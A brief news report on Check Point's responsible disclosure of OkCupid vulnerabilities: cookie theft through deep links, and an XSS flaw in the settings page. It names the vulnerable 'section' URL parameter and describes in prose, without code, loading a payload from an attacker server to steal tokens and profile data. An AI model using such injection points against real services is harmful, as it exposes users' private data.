Facebook
Twitter

Popular online dating app OkCupid was found to contain several security issues. Some cyber security researchers recently disclosed the flaws which could have let malicious entities spy on users’ private information or misuse of the targeted accounts.

The security issues in OkCupid’s web and Android applications, detected by researchers from Check Point, could have let cyber criminals steal user IDs, authentication tokens, and sensitive information pertaining to private subjects such as sexual orientation, preferences, email addresses, etc.

The researchers shared their findings responsibly with OkCupid, stating that not a single user was impacted by the potential vulnerability, which was identified as a part of reverse engineering of OkCupid’s Android app version 40.3.1.

The flaws in the applications also included OkCupid’s use of deep links, which could also have enabled a bad actor to send a custom link defined in the app’s manifest file to open a browser window with JavaScript enabled. Such requests were found to return users’ cookies.

The researchers also found a separate flaw in OkCupid’s settings functionality which makes it vulnerable to an XSS attack through the injection of malicious JavaScript code using the “section” parameter as follows: https://www.okcupid.com/settings?section=value.

This XSS attack could also be augmented further by loading a JavaScript payload from an attacker-controlled server, which would enable the attacker to steal important data such as profile information, authentication tokens, and user preferences, and transmit the stolen data back to the server.

The detection of vulnerabilities in the OkCupid web and mobile applications by the researchers at Check Point has helped to save several app users from having their personal data misused by malicious cyber attackers. The app might now start working on fixing these security issues so that people continue using it without worrying about privacy breach.